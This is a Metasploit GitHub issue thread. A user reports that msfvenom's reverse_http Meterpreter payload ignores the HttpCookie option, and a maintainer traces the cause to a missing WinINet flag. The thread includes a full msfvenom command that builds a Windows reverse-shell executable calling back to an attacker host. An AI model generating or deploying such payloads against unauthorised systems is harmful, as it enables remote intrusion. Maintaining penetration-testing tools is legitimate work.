### ISSUE TITLE
msfvenom payload reverse_http not use HttpCookie options value

### ISSUE THREAD

**Issue by symsal** [rapid7/metasploit-framework#12826]
## Steps to reproduce

How'd you do it?

1. msfvenom -p windows/meterpreter/reverse_http LHOST=x LPORT=80 HttpUserAgent=Y HttpCookie="cool_id=123456" -f exe > file.exe
2. exec file.exe on windows 7 
3. open wireshark 
4. Analyze http protocol

GET /getFile.php HTTP/1.1
User-Agent: Y
Host: website.com
Connection: Keep-Alive
Cache-Control: no-cache

No Cookie set.

## Expected behavior

GET /getFile.php HTTP/1.1
User-Agent: Y
**Cookie: cool_id=123456**
Host: website.com
Connection: Keep-Alive
Cache-Control: no-cache

### Metasploit version

Get this with the `version` command in msfconsole (or `git log -1 --pretty=oneline` for a source install).

**Framework: 5.0.62-dev**

### I installed Metasploit with:
- [x] Kali package via apt
- [ ] Omnibus installer (nightly)
- [ ] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
- [ ] Source install (please specify ruby version)

### OS

What OS are you running Metasploit on?
Kali

**Comment by dwelch-r7** [comment]
I was able to replicate this, I'll see if I can find a root cause

**Comment by dwelch-r7** [comment]
It looks like this flag `INTERNET_FLAG_NO_COOKIES` isn't being set so windows wants to manage the cookies for us, when I manually set this flag the cookie value comes through
I'll work on a solution for this and check to see if it affects us in other areas
